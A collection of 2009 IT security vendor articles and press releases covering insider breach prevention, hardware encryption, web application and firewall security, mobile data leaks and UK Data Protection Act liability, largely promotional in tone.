Five Best Practices for Mitigating Insider Breaches

Adam Bosnian, VP Marketing Cyber-Ark Software

Mismanagement of processes involving privileged access, privileged data, or privileged users poses serious risks to organisations. Such mismanagement is also increasing enterprises’ vulnerability to internal threats that can be caused by simple human error or malicious deeds.

According to a recent Computing Technology Industry Association (CompTIA) survey (see http://www.comptia.org/pressroom/get_pr.aspx?prid=1410), although most. respondents still consider viruses and malware the top security threat, more than half (53 percent) attributed their data breaches to human error, presenting another dimension to the rising concern about insider threats. It should serve as a wake-up call to many organisations, that inadvertent or malicious insider activity can create a security risk.

For instance, take the recent data breach that impacted the Metro Nashville Public Schools. In this case, a contractor unintentionally placed the personal information of more than 18,000 students and 6,000 parents on an unsecured Web server that was searchable via the Internet. Although this act was largely chalked up to human error and has since been corrected, anyone accessing the information when it was freely available online could create a data breach that could cause significant harm to these students and parents.

Moreover, the Identity Theft Resource Center (ITRC) recently reported that insider theft incidents more than doubled between 2007 and 2008, accounting for more than 15 percent of data breaches. According to the report, human error breaches, as well as those related to data-in-motion and accidental exposure, accounted for 35 percent of all data breaches reported, even after factoring in that the number of breaches declined slightly during this period.

To significantly cut the risk of these insider breaches, enterprises must have appropriate systems and processes in place to avoid or reduce human errors caused by inadvertent data leakage, sharing of passwords, and other seemingly harmless actions. 

One approach to address these challenges is digital vault technology, which is especially valuable for users with high levels of enterprise/network access as well as those handling sensitive information and/or business processes such as users with privileged access -- including third-party vendors or consultants, executive-level personnel -- or access to the core applications running within an organisation’s critical infrastructure.

Instead of trying to protect every facet of an enterprise network, digital vault technology creates safe havens -- distinct areas for storing, protecting, and sharing the most critical business information -- and provides a detailed audit trail for all activity associated within these safe havens. This encourages more secure employee behavior and significantly reduces the risk of human error.

Here are some best practices for organisations serious about preventing internal breaches, be they accidental or malicious, of any processes that involve privileged access, privileged data, or privileged users.

Best Practice #1: Establish a Safe Harbor

By establishing a safe harbor or vault for highly sensitive data (such as adminstrator account passwords, HR files, or intellectual property), build security directly into the business process, independent of the existing network infrastructure. This will protect the data from the security threats of hackers and the accidental misuse by employees.

A digital vault is set up as a dedicated, hardened server that provides a single data access channel with only one way in and one way out. It is protected with multiple layers of integrated security including a firewall, VPN, authentication, access control, and full encryption. By separating the server interfaces from the storage engine, many of the security risks associated with widespread connectivity are removed.

Best Practice #2: Automate Privileged Identities and Activities

Ensure that administrative and application identities and passwords are changed regularly, highly guarded from unauthorised use, and closely monitored, including full activity capture and recording. Monitor and report actual adherence to the defined policies. This is a critical component in safeguarding organizations and helps to simplify audit and compliance requirements, as companies are able to answer questions associated with “who” has access and “what” is being accessed. 

As listed among the Consensus Audit Guidelines’ 20 critical security controls, the automated and continuous control of administrative privileges is essential to protecting against future breaches. [Editor’s note: the guidelines are available at http://www.sans.org/cag/.]

Best Practice #3: Identify All Your Privileged Accounts

The best way to start managing privileged accounts is to create a checklist of operating systems, databases, appliances, routers, servers, directories, and applications throughout the enterprise. Each target system typically has between one and five privileged accounts. Add them up and determine which area poses the greatest risk. With this data in hand, organisations can easily create a plan to secure, manage, automatically change, and log all privileged passwords.

Best Practice #4: Secure Embedded Application Accounts

Up to 80 percent of system breaches are caused by internal users, including privileged administrators and power users, who accidentally or deliberately damage IT systems or release confidential data assets, according to a recent Cyber-Ark survey.

Many times, the accounts leveraged by these users are the application identities embedded within scripts, configuration files, or an application. The identities are used to log into a target database or system and are often overlooked within a traditional security review. Even if located, the account identities are difficult to monitor and log because they appear to a monitoring system as if the application (not the person using the account) is logging in.

These privileged, application identities are being increasingly scrutinized by internal and external auditors, especially during PCI- and SOX-driven audits, and are becoming one of the key reasons that many organizations fail compliance audits. Therefore, organisations must have effective control of all privileged identities, including application identities, to ensure compliance with audit and regulatory requirements.

Best Practice #5: Avoid Bad Habits

To better protect against breaches, organisations must establish best practices for securely exchanging privileged information. For instance, employees must avoid bad habits (such as sending sensitive or highly confidential information via e-mail or writing down privileged passwords on sticky notes). IT managers must also ensure they educate employees about the need to create and set secure passwords for their computers instead of using sequential password combinations or their first names.

The lesson here is that the risk of internal data misuse and accidental leakage can be significantly mitigated by implementing effective policies and technologies. In doing so, organizations can better manage, control, and monitor the power they provide to their employees and systems and avoid the negative economic and reputational impacts caused by an insider data breach, regardless of whether it was done maliciously or by human error.

www.cyber-ark.com

- - -

Adam Bosnian is the vice president of products and strategy at Cyber-Ark Software (http://www.cyber-ark.com/). He is responsible for the global product and business strategy of the company as well as for managing the North American sales organization and growing the business in this area.

<>

Encryption is the equivalent of a seat belt for data

By Andy Cordial, Managing Director at Origin Storage

The first thing most of us do when we get into a car is put on a seatbelt, whether we’re driving or just along for the ride – it’s so important that it’s the law in the UK. We don’t plan to have an accident but, just in case we do, we’re protected. So why don’t we give our data the same courtesy?

The quantity of electronic data relied upon by both the private and public sectors alike are increasing at a rapid rate. Before we go further let’s just clarify what is meant by data – anything stored electronically : there’s the usual documents, email and databases etc., but also another growth area is surveillance monitoring and the resulting video, audio and data streams all contribute to these data banks which need to be stored and managed carefully.

The ability to carry data when we’re going about our daily business, whether on portable hard drives, laptops, or USB sticks, etc., has inarguably revolutionised working practices. No longer constrained by the physical boundaries of the office, people are free to work just about anywhere - at home, in the pub, on the train or in the air, at a client’s premises, even McDonalds offers wi-fi access. However, there has been a price to pay. News reports on data leakage have become a regular feature and causes huge embarrassment to organisations, impacting their image and damaging the relationship with customers. So why is the lesson taking so long to learn?

Many organisations have turned to encryption as a saving grace without fully understanding the problem they face, and as a result have fallen foul. There are a number of software based solutions that sit at entry level however it is proven that they can be bypassed relatively easily. A case in point is that of PA Consulting - a single employee was in breach of its well-established information security processes when allowed to bypass the encryption software that would have protected the personal data of 84,000 prisoners in England and Wales when transferred to a memory stick which subsequently went missing. PA Consulting lost its £1.5 million contract, and jeopardised their remaining £8 million Government contracts

Instead of relying on users to encrypt data before transferring it to a portable device, isn’t it better for the external device to have encryption already built in? External hard drives are available that utilise a hardware based encryption chip to seamlessly encrypt and decrypt data using military grade AES / CBC mode encryption.

Like any product, there are variants, so its important to identify what’s important when evaluating the various offerings, key things to look for are:

1. If users, for example, are likely to be walking away and returning when using a device, but not wishing to log out every time, it may be considered important to have a quick disconnect feature via the LCD panel so that the external drive disappears from the users screen and cannot be accessed until the correct PIN is entered.

2. Another concern is that the keypad may involuntarily disclose the PIN – either due to marks on the keypad or from shoulder hacking, so a random display facility may be considered essential.

3. A further consideration is what happens if an incorrect PIN is used. Potentially if there is no retribution for entering an incorrect code then perseverance could be rewarded and the data breached. It may be deemed important that after a predetermined number of failed attempts the data is destroyed to ensure its integrity.

4. Plugged in via a USB cable, users are presented with a familiar LCD panel on the device itself to enter an up-to 18 digit PIN and without the decipher code the data is inaccessible.

5. Of significant importance may be the need for regular password changes. The firmware should have the facility to be customised to present the user with a message that makes sure that the password is regularly changed and/or registered within the IT department.

6. Unlike software based encryption, this solution is not vulnerable to the same hack programs, decryption software and key loggers which plague other products on the market that make their use un-safe.

The ability to work whenever and wherever we want has significant benefits, especially in today’s 24/7 culture, so it is only fair that when data is involved it is done so responsibly and securely. Since 1965 it has been compulsory for cars in the UK to be manufactured with seat belts although it took 18 years before it become compulsory for them to be used in the front of vehicles and a further eight in the rear – how many preventable deaths resulted in this intervening time? Now you could argue that no-one would die from unsecured data, but individuals could be affected in the event of an accident resulting in a breach, and in fact have – TV presenter Jeremy Clarkson inadvertently proved what can be done with limited personal information in the wrong hands when he lost money after publishing his bank details in a newspaper in January 2008 (1)!

We will not have long to wait before we see notebooks coming to the market that have encryption built in to the hard drive. A marriage of technologies, the SED (Self Encrypting Disk) is the opal standard established by trusted computing. One example is the new range of laptop drives that will be completely encrypted and will sit internally in its notebooks. As a user the encryption is seamless needing only to enter an additional password when logging in and therefore is impossible to bypass.

I find it difficult to understand how anyone can justify carrying electronic data unsecured in the public domain. People need to be educated as to the many different options available however, in my opinion, transparent encryption of not just sensitive but all portable data reduces the risk of the individual either forgetting, or worse bypassing, this safety belt. The next time you decide to carry data out of the safe confines of the corporate environment, remember to buckle it up.

Origin Storage is exhibiting at Storage Expo, 14th – 15th October, Olympia, London www.storage-expo.com. The UK’s definitive event for data storage, information and content management provides the opportunity to compare the most comprehensive range of solutions and services from leading suppliers with a free and unrivalled education programme.

<>

1 http://news.bbc.co.uk/1/hi/entertainment/7174760.stm

Scientific company discusses simultaneously protecting applications and data

Simultaneously protecting applications and data: The next evolution in security?

September 2009 (Eskenzi PR) – In a recent Imperva podcast interview, Chad Lorenc of Agilent Technologies, explained how to create a highly secure communications infrastructure to securely collaborate with their outsourcing partners. The key element: the synergies between database and application protection within a single, unified view.

Lorenc, information security network and application security architect with the IT design and measurement specialist - and a customer of Imperva's - talked about the popular issue of application security and how his company, while outsourcing a number of its IT services, maintains the highest possible levels of security on its network.

Because Agilent carries out a lot of outsourcing of its IT functions, the company has created a highly secure communications infrastructure. Web applications are accessed internally and externally – thus, they needed to secure data from insiders and outsiders. “Because Agilent is so highly outsourced, Web application security is critical—but it is joined at the hip with data,” explained Lorenc.

Agilent's strategy, says Lorenc, is to use a three-tier IT security structure, with the firm's external DMZ (demilitarised zone) interfacing securely with its own core IT resources.

Their approach of using application monitoring and security was made very easy because they had created a very advanced environment with a lot of unique places to put in chokeholds, monitor data, block data, do database monitoring. Imperva’s web application firewall gives visibility into how users interact with their assets. This information is used to help guide and validate their application security policy.

From a data protection standpoint, discovery was an important phase to understand what assets they have, and what risks are associated with those assets. Imperva found and classified all their valuable assets so they knew what to protect.

The problem is made all the more complex, said Lorenc, by the fact that the company's data is effectively residing in as many as 10 or 12 locations.

In the three-tier security structure, therefore, the core IT resources are interfaced securely with the DMZ, and then on to `true' external IP network-connected systems.

This effectively makes the DMZ a secure virtual cloud environment that Agilent has to ensure maximimum possible security, but whilst maintaining effective communications with its partners.

Lorenc describes this approach as very challenging and requiring the use of a discovery model to ensure best security across multiple platforms - including PHP, Ajax, Java and Microsoft .NET.

"Agilent has encountered a unique set of security challenges as a result of its unusual three-tier security architecture, but has fully met this challenge using conventional IT security technologies, bonded together to create a customised solution," said Brian Contos.

"By linking its Web application firewall technology with a disparate range of other security systems, Agilent has created a unique and highly secure hybrid VPN environment that performs smoothly, despite its complexities," he added.

Join Imperva and Agilent for this educational and entertaining podcast here... http://preview.tinyurl.com/nxdwwn

For more on Imperva: http://www.imperva.com

Agilent Technologies Inc. (NYSE: A) is the world's premier measurement company and a technology leader in communications, electronics, life sciences and chemical analysis. The company's 18,000 employees serve customers in more than 110 countries. Agilent had net revenues of $5.8 billion in fiscal 2008. Information about Agilent is available on the Web at www.agilent.com.

Imperva, the Data Security leader, enables a complete security lifecycle for business databases and the applications that use them. Over 4,500 of the world’s leading enterprises, government organizations, and managed service providers rely on Imperva to prevent sensitive data theft, protect against data breaches, secure applications, and ensure data confidentiality. The award-winning Imperva SecureSphere is the only solution that delivers full activity monitoring from the database to the accountable application user and is recognized for its overall ease of management and deployment. For more information, visit www.imperva.com.

<>

UK firms need to tighten up on Web app security

Imperva says UK firms need to tighten up on Web app security

September 2009 (Eskenzi PR) – News that more than a quarter of all Web applications have a high risk of security vulnerabilities comes as no surprise, nor is the fact that the problem is getting worse, says Imperva, the data security specialist.

"The 2009 Web Application Security Report from NTA Monitor shows that the number of apps with at least one high risk vulnerability has soared from 17 to 27 per cent in the last year, whilst the medium risk category has risen from 78 to 90 per cent," said Brian Contos, Imperva's chief risk strategist.

"Although this comes as no surprise to us, it is an appalling indictment on the software audit and control operations in most companies. With NTA spotting an average of 13 vulnerabilities per test, it's clear that IT departments really do need to pull their socks up in terms of testing and auditing of their software development processes," he added.

According to Contos, NTA Monitor's report proves what Imperva has been telling its clients for some time - namely that few organisations have the in-house resources to perform regular software testing and updating a clearly-stated set of application security policies.

Perhaps worse, he said, even fewer companies do as NTA Monitor suggests and include security service level agreements into their contracts with Internet or managed service providers.

Staff training, he explained, is central to application auditing and testing, and, since few organisations have the time or skills required, the key to the problem is effective outsourcing.

This is why, Contos noted, Imperva's activity monitoring, real-time protection and risk management of critical business data and applications is now used by more than 4,500 organisations in over 100 countries.

For more on NTA Monitor's report: http://preview.tinyurl.com/mmr69h

For more on Imperva: http://www.imperva.com

<>

Storage Expo - free advice on cloud issues from Google

(Storage PR) Storage Expo, the definitive data storage, information and content management event, is pleased to announce it will be hosting Mr Xen Lategan, technical lead for Google's UK, Ireland and Benelux operations, who will be giving a keynote address at the event.

Mr Lategan, who was a software architect with Accenture, founder of Navigator Computers and a senior technical specialist with Microsoft before joining Google, will be giving the keynote address on day two of Storage Expo, which takes place at London Olympia on October 14/15 this year.

The theme of the Google expert will be this year's hot topic of cloud computing, with which Mr Lategan is very familiar, having specialised in cloud and software-as-a-service (SaaS) technologies for several years.

According to Natalie Booth, Event Manager of Storage Expo, with several major IT players, including Computer Associates, Novell and Unisys having announced plans for secure cloud services for companies in recent weeks, the topic of cloud computing is set to become even hotter on boardroom agendas in the months ahead.

"The advantages of cloud and SaaS technologies are now very clear - lower operating costs for most firms and access to company data on a near-anywhere, anytime basis - making for improved business efficiencies and, of course, and enhanced bottom line," she said.

"Most organisations, however, are relatively poorly equipped to handle the logistics - as well as the security implications - of migrating to a cloud/SaaS architecture, so we're pleased that Mr Lategan, with his considerable experience in the area, will be giving the keynote," she added.

According to Booth, plans call for Mr Lategan to explain why cloud values are critical to all businesses, especially in the current economic environment.

Mr Lategan will also be looking at how cloud computing can help you find, share and secure your company information.

This year's Storage Expo has a comprehensive range of free advice, keynotes and seminars, all designed to ensure that organisations of all sizes can now get the advice they need free of charge.

Alongside key presentations from Amazon and Google, there will be an up-the-minute virtualisation showcase, as well as cloud and information & content management zones, channel and launch areas, interactive workshops and several roundtable sessions, including:

Andrew Reichman, Senior Analyst, Forrester will lead the keynote on optimising storage through the downturn: delivering first class storage on a third class ticket. Carla Arend, Program Manager, European Infrastructure Software, IDC Group will lead the panel on future directions that will shape your storage strategies for tomorrow.

Tony Lock, Programme Director, Freeform Dynamics will advise on what to look for when buying a virtualisation solution and find out the top 5 tips for aligning business and IT objectives with ESG’s Managing Director Steve O’Donnell.

Rene Millman, Senior Research Analyst, Gartner Research will expose the truth and hype about cloud and Nigel Stanley, Practice Leader, Bloor Research will chair a panel on is your backup and archive effective.

John Abbot, Founder and Chief Analyst at The 451 Group will discuss Disaster Recovery and the changes server virtualisation will bring and Jon Collins, CEO & Managing Director, Freeform Dynamics will lead the practitioner panel: how to manage your it director

This year we have changed the seminar programme with 2 key themes: “It all starts with Storage” and “Don't just store it, do more with it.”

The “It all starts with Storage” stream will demonstrate optimisation of assets, reduction of cost, storage as an enabler, how to store unstructured data and creating a business case for storage. Key areas that will be covered include Virtualization, Thin Provisioning, SAAS/Cloud, De-duplication, Storage Infrastructure and Networks, Storage Architecture/SAN, Storage as a Platform, SSD's & Flash, IP Storage/FCoE and Data Centres

The “don’t just store it stream”, will include focus sessions on business intelligence, successful information management, and managing unstructured data. Key technologies will include: Enterprise Applications, Information Infrastructure, Sharepoint, BC/DR/Backup, Retrieval/Search, Security, Archiving/Email, Classification/DR, File Sharing/Collaboration, Data Warehousing/Mining and Content and Records management

As limited bank lending constrains the recovery that everyone is waiting for, all it takes is a day out of the office and any manager interested in enhancing their IT knowledge can learn how to do so expediently and cost-effectively.

And the even better news is that, unlike similar events, all of the exhibitions, including seminars and educational programmes, are free to attend.

This will, said Booth, make even your CFO smile.

"The Q&A sessions are the jewel in the crown for exhibition attendees. As well as getting some of the best advice from key industry figures, you'll also have the chance to quiz them on your own specific circumstances. And all for free," she said.

"If that doesn't warrant a day of your time out of the office, just ask your CFO how much this type of impartial IT advice can cost your organisation. Then register for the free event at http://www.storage-expo.com," she added.

<>

DeviceLock host Webinar on securing businesses against mobile data leaks - Tuesday, 22nd September at 3pm

SECURE YOUR BUSINESS AGAINST MOBILE DATA LEAKS WITH ENHANCED DEVICE CONTROL ON CORPORATE ENDPOINTS

A DeviceLock Webinar hosted by Infosecurity Magazine

London, UK – September 16, 2009 – DeviceLock a worldwide leader in endpoint device control and context-aware data leak prevention software solutions, today announced it will be holding a webinar hosted by Infosecurity Magazine UK on Tuesday, 22nd September at 3pm.

The webinar will address what businesses should do to reduce the threat of data leaks through personal mobile devices like smartphones and PDAs. A leading IT security analyst will participate in the webinar moderated by Infosecurity Magazine’s Technical Editor Steve Gold. The world of end point security is changing rapidly. The proliferation of high-end consumer technology such as PDAs, MP3 players and Smartphones, has driven increasing adoption of consumer technology in the corporate environment. Microsoft is re-energising its Windows Mobile operating system, while the range of Apple iPhone's apps is soaring, as enterprise grade software developers get to grips with the highly flexible iPhone operating system that Apple has created. Add in the myriad security issues caused by portable storage devices such as iPods plus semi-intelligent USB sticks and it's clear that that the world of enforcing policies and rules on end point security are changing very quickly indeed.

It's against this backdrop that Infosecurity has teamed up with DeviceLock, one of the leading end point security specialists, to offer a webinar that will bring the audience up to speed on the threats and challenges that the rapidly evolving mobile IT world engenders.

This webinar will:

  • Give attendees a thorough insight into the anatomy of mobile data leaks and how the problem can be countered.
  • Detail the solutions to these security threats.
  • Help you understand the multiple topologies involved, and how an external mobile threat can also become an internal one.
  • Offer you specific advice - via an interactive Q&A session - on the end point security issues that affect your organisation.

Alexei Lesnykh, Business Development Manager with DeviceLock, will discuss how mobile data leaks through employee smartphones may originate from corporate endpoint computers over local connections that completely bypass the corporate network and cannot be prevented by any network-resident security solutions. The presentation will explain how DeviceLock software helps organizations mitigate these threats through the use of a patent-pending local synchronization control technology.

To register for the webinar go to: http://www.infosecurity-magazine.com/webinar/70/end-point-security-is-changing-can-you-cope/

Following the webinar, DeviceLock will be running a series of technical demonstrations on its award winning endpoint DeviceLock endpoint security software. For more information see www.devicelock.com

Since its inception in 1996 as SmartLine, DeviceLock, Inc. has been providing endpoint device control software solutions to businesses of all sizes and industries. Protecting 4 million computers in over 60,000 organizations worldwide, DeviceLock has a vast range of corporate customers including financial institutions, state and federal government agencies, classified military networks, healthcare providers, telecommunications companies, and educational institutions. DeviceLock, Inc. is an international organization with offices in San Ramon (California, US), London (UK), Ratingen (Germany), Moscow (Russia) and Milan (Italy).

Aspectus PR

<>

Bye Bye Baby

Calum Macleod, Regional Director Tufin Technologies

So the day is finally arriving. Our “baby” is getting married, the culmination of two years where we’ve saw him go through a different girl every week – or rather they went through him! - some which met with his mother’s approval and most who did not until finally he came home with the one who most definitely did not! Only to discover that after two years he’s marrying a blond version of his mother so she now has total approval!

And the last few weeks have been the usual nightmare of organization. Family arriving from all ends of the earth, all looking – like most Scots – for low cost (read “can we sleep on your floor – there’s only 25 of us”) accommodation. Trying to organize services, receptions, invitations etc., and through it all the groom is blissfully ignorant. In fact he just announced three days before the wedding that there’s a football game the night before the wedding which he’s planning to go to. Knowing his mother and his future wife, I think I’ve convinced him that this may not be the smartest move, for his own health!

But like most “users”, he is blissfully ignorant of what the simple statement “I’m getting married means”. A bit like the user who tells the IT department, “I just need access to a certain application.”

The simple request from a user can frequently create a nightmare for most security departments, especially when it means changing firewall configurations!

I mean where do you start? Before you even consider what needs changing you need to go through a process to confirm that a user is authorized to access the system; that somebody has approved the request; that the request complies with organizational policy; that the requested service is not already available. Almost daily I receive requests asking for connection to systems that already exist.

And it goes on. What impact will the change have on other services; how long should the service be available; where should access be allowed from. And once we’ve gone through all these considerations, somebody has to sit down and actually figure out the fine print. Like the wedding, some bright spark decided an order of service was necessary and who better to do this than the “computer expert”. So with poems and songs and liturgy coming from all sources, and in all formats, it’s been yours truly’s job to figure it out. And did I get it right first time. Oh no – it takes days to get it just right!

And this is frequently the nightmare for many firewall administrators. Converting a request into an actual change is not only time consuming, it is very often something that has to be redone because it has to be changed. Recently an acquaintance who is a firewall admin was having a crisis attack after he changed something on the firewalls at the weekend which caused a system to crash. He couldn’t make our lunch appointment because he wasn’t in the good books with his boss apparently, so was focusing on solving the problem – i.e. keeping his job! You might think that he could just reverse the process and that would be it, but it’s never that simple. Tracking changes is one of the biggest challenges for firewall admins!

The lack of automation and operational efficiency tools results in administrators spending most of their time on repetitive, manual tasks in an attempt to enforce corporate policies over many distributed infrastructure components. Security managers need to provide their staff with the necessary tools they need to automate repetitive components of the security lifecycle in order to reduce the time spent on time-consuming tasks and to invest resources more effectively. With automation, many manual analysis and auditing operations can be reduced from days to a matter of hours.

Recently Swisscom IT Service implemented an automated policy management solution with the result according to Swisscom that they now have “an unprecedented amount of visibility and control over firewall operations.” The automation provided them with an overall snapshot of the state of their firewalls that enables them to operate in a much more agile, proactive, and strategic manner. According to Swisscom “We accomplish more in less time, with full confidence that we are operating in a secure, compliant fashion."

Companies need to understand the business impact of network security and to demand a high level of transparency and accountability. At the same time, they are facing the need to comply with a variety of government, industry and regulatory security standards. As a result, companies are developing ever-more detailed and complicated security policies. Implementing them on the ground, over thousands of infrastructural components, is a time-consuming and error-prone process, especially when they continue to rely on outdated manual processes and not use the automation tools that exist.

To ensure that corporate security policies are implemented accurately and consistently, companies need to employ process automation to manage changes to security infrastructure. More than any manual process, change automation can ensure separation of duties and accountability.

Every change to security infrastructure involves risk. As enterprise networks grow and become more complex, organizations struggle to ensure that routine security administration does not accidentally result in downtime or even business-level disruptions.

Organizations need automated risk analysis procedures that can proactively examine every change request in the context of both organizational security policy and current implementation realities. There’s no point having policies that are not being enforced on the ground. My car has a handbook that advices me to get it served every so often but if I don’t then the consequences are clear!

According to Greg Young from Gartner "Compliance and complexity are driving the requirement for better capability in optimizing the existing firewall rules base, and examining the impact of any proposed rule changes." And experts will tell you that poorly configured firewalls remain a significant risk for many organizations. It’s not the technology that’s at fault, but rather the configuration and change control processes that are neglected or missing altogether. Best practice suggests you should test and review your firewall configuration regularly, but many organizations fail to do this.

So in a few days from now our baby will dress up and do his bit. Everything will be automated down to the last toast. Now where’s the speech I used last time!

www.tufin.com  

<>

Toll-Free PBX hack highlights need for code auditing

Toll-Free PBX hack highlights need for code auditing says Fortify

September 2009 (Eskenzi PR) - Reports that a North Carolina business has been left with a $2,500 phone bill after phone phreakers hacked its PBX via the firm's toll-free (freephone) number shows the danger of failing to audit all aspects of a systems' software, says Fortify, the application vulnerability specialist.

"What this case shows is that, although the PBX supplier may have verified the security of the front line telephony interface on its PBX systems software, the hackers were able to break in via the side door effectively offered by the toll-free number," said Richard Kirk, Fortify's European Director.

"This is because a growing number of toll-free service providers support access to the direct dial inwards (DDI) numbers seen on the PBX systems of small-to-mid-sized enterprises," he added.

And, says Kirk, since these DDI numbers are mapped directly on to PBX extensions, the security levels on this side door method of access is often a lot less than the front door, the firm's main telephone number.

Of course, he explained, what makes matters worse about this hack is that the firm ended up paying for the hackers' incoming calls to its toll-free number, as well as the subsequent calls to foreign destinations.

According to the Fortify Director, the case proves that hackers can - and will - exploit the weakest link in the security of any public-facing computer system, whether that system if it is Internet or telephone network-facing.

"It's therefore vitally important for any code developers working on such a system, whether it's PBX systems software, or an e-commerce application, to secure the side door entrances, as well as the front entrance," he said.

"Just because the side door is not directly accessible at the moment, does not mean it won't become accessible at some time in the future, as new features and services are added to the software. Code auditing requires the use of lateral thinking in this regard," he added.

For more on the toll-free PBX hack: http://preview.tinyurl.com/mo876o

For more on Fortify Software: http://www.fortify.com

<>

Could your mobile device land your CEO in court?

Sean Glynn, Credant Technologies

The humble PC is now around 25 years old, but, in many ways, the IT security industry - which has been with us for almost as long - has changed more in the last 2.5 years than the last 25.

Today's portable devices, notably smartphones powered by the Windows Mobile, Symbian, Apple and Blackberry operating systems, are microcomputers in their own right.

But their processing power capabilities are significantly behind the curve of their desktop cousins. Our best estimates here at Credant are that the modern smartphone in your pocket or purse probably has the processing power of a PC of about a decade ago.

And therein lies the problem. Encrypting data on the fly on most smartphones if done in the wrong way can take an awful lot of processing power, with the result that users get frustrated with seeing the hour-glass busy symbol under Windows Mobile, or similar busy icons under other operating systems and may just switch it off or ignore it.

But what happens if you don't encrypt the data on your portable device such as your smartphone or your laptop? What can possibly go wrong?

Quite a lot, when you consider the requirements of the Data Protection Act.

The Act - now backed up by European data directives - moves the issue of data protection out of the good-to-have and firmly into the must-have category, mainly because of the responsibilities these directives engender – and this can be done with the right software that won’t slow the device down and is invisible and seamless to the user.

Those responsibilities are compounded by the fact that many company employees often use their own portable devices for business - and vice versa - meaning that security safeguards applied to company PDAs, smartphones and laptops are often not applied to personal devices.

- Smartphones are minicomputers

As mentioned above, the latest generation of smartphones and PDAs are as powerful as the computers of the late 1990s - and their data storage capabilities are even more powerful.

The latest crop of Palm mobile computers/smartphones, for example, have a data capacity of 2 gigabytes, meaning that they can easily store 2,000 emails and/or 3,000 medium-sized documents.

And not just can - they frequently do store thousands of emails and documents for ease of reference and replies out of hours.

The only solution to all of these potential threats is encryption. Encryption is clearly the way to protect communications. It won't stop eavesdroppers (whether government-sponsored Echelon, profit-driven industrial spies, or good old hackers) from intercepting your messages - but it will stop them gaining anything useful from them.

But encrypting communications is no longer enough - you also need to encrypt the data stored on the mobiles devices, and all endpoints to stay on the right side of the law.

And the number of high profile laptop thefts is frightening, and growing. In the US, a computer insurer has estimated that five per cent of all laptops are stolen within their first 12 months of service.

On top of this, you also have to wonder just how many unreported thefts actually occur.

However, while it is clearly advisable to encrypt the data stored on all your mobile devices, it may, within the European Union, in fact be a legal requirement especially as they are frequently used to not only store company contact information but also a home address, mobile phone number and even home phone number.

In other words it is likely to include personal information that needs to be registered - and protected - as required under the Data Protection Act.

The seventh principle of this Act is unequivocal: "Appropriate technical and organisational measures shall be taken against unauthorised or unlawful processing of personal data and against accidental loss or destruction of, or damage to, personal data."

First of all it is worth considering who is liable under this Act. The Act states that conformance to the Data Protection Act is the responsibility of the Data Controller.

And it defines a 'data controller' as being... "a person who (either alone or jointly or in common with other persons) determines the purposes for which and the manner in which any personal data are, or are to be, processed."

- Senior managers are personally liable

In other words, this 'person or persons' is effectively the Board and the immediate data processing managers.

One thing it is not and that is the person who 'owns' the portable device.

It is arguable that, if the data is on the smartphone, laptop or other endpoint device – and it is there by company assent, then it is the company that is determining the purposes for and manner in which it is to be processed. And it is therefore the company that is liable.

Against this backdrop, if your portable device falls into the wrong hands it could land your boss in court.

But if the data is on the mobile device without company assent, then the firm has probably already broken the Data Protection Act by failing to protect "against accidental loss or destruction of, or damage to, personal data"; that is, it has 'broken' the seventh principle.

Company rules might say, for example, that if employees carry company data on their own mobile device, they must use encryption to protect it.

"The employee is, of course, responsible for implementing the rules, but is probably responsible to the employer rather than directly to the Commissioner," explains Nicholas Bohm, a consultant to the E-Commerce Group of City law firm Fox Williams.

In other words, the company is still liable.

Quite simply, there is no way round this – the company is liable and must adhere to the conditions of the Data Protection Act - if employees use mobile devices that include contact information.

And, once again, it is worth considering the wording of the Act itself: "Where an offence under this Act has been committed by a body corporate and is proved to have been committed with the consent or connivance of or to be attributable to any neglect on the part of any director, manager, secretary or similar officer of the body corporate or any person who was purporting to act in any such capacity, he as well as the body corporate shall be guilty of that offence and be liable to be proceeded against and punished accordingly."

Put simply, this means you, a company director.

What actually constitutes appropriate technical and organisational measures is something that ultimately can only be defined by the courts - but it would be best not to let it get that far.

It seems fairly clear that 'organisational measures' could be covered by a formal written and enforced security policy designed to protect the mobile device and its data. But covering appropriate 'technical measures' is more difficult.

If we were talking about the corporate mainframe, then we would obviously be thinking about a firewall.

Unfortunately, despite the best efforts of the smartphone, PDA & laptop vendors, few include any sort of firewall protection, so it is down to users to encrypt their data and so stay safe.

Encrypted data is safe data. Confidential information is hidden from industrial spies and hackers alike. This is an advisable although not compulsory course of action.

However, if the mobile device contains contact information, then you must seriously consider its liability under the Data Protection Act. And in this case, encryption is almost compulsory.

www.credant.com

Courtesy: Eskenzi PR
<>

Cyber-Ark Launches latest Privileged Identity Management Suite

Cyber-Ark Delivers New Performance and Ease-of-Use Benefits for its Privileged Identity Management Suite

New Application Identity Manager Provides the Most Secure and Robust Authentication Methods for App2App Environments to Help Streamline and Support Audit Requirements

London – September 2009 (Eskenzi PR) – Cyber-Ark, the leading global software provider for protecting critical applications, identities and information, today announced enhancements to its Privileged Identity Management Suite. The suite includes a new version of its Application Identity Manager™ that features the most secure and robust authentication methods for App2App environments, resulting in greater compliance, security and corporate accountability while dramatically simplifying large scale projects for eliminating hard-coded passwords.

Cyber-Ark’s Privileged Identity Management Suite v5.5 features a rich set of capabilities based on proven, mature technology used by global customers to create security best practices across all types of privileged accounts, including administrative and application identities. New features focus on creating greater efficiencies and process improvements to ensure that privileged accounts are being effectively managed, monitored and controlled in order to address emerging audit requirements and better protect high-value targets such as databases, key operational systems and other sensitive information.

“With the newest version of the Cyber-Ark Privileged Identity Management Suite, we continue to demonstrate our commitment to delivering key performance benefits that optimize our solutions to meet emerging customer requirements. New ease-of-use and process integration features are critical, especially when you consider the challenges many of our customers face as they transition to managing hundreds of thousands of privileged accounts,” said Roy Adar, vice president of product management, Cyber-Ark Software. “Additionally, as audit requirements continue to create a significant drag on resources for enterprises of all sizes, enhancements to solutions such as our Application Identity Manager help customers further automate and streamline related compliance processes.”

Cyber-Ark’s Privileged Identity Management Suite provides customers with a central point of control to achieve exceptional security, streamline updates with enhanced workflows, and ensure compliance with regulations and security policies. The suite features new functionality across its core Enterprise Password Vault®, Application Identity Manager and Privileged Session Manager™ software. Following are detailed performance and ease-of-use enhancements to these solutions.

Application Identity Manager: Multiple Authentication Methods, Greater Accountability

Cyber-Ark’s Application Identity Manager is the only solution to fully address the challenges of App2App identities, including eliminating hard-coded passwords. The solution also supports compliance with audit regulations for regularly replacing passwords and securely monitoring access across all systems, databases and applications. With this newest version, Cyber-Ark introduces the most secure and robust application authentication methods available on the market.

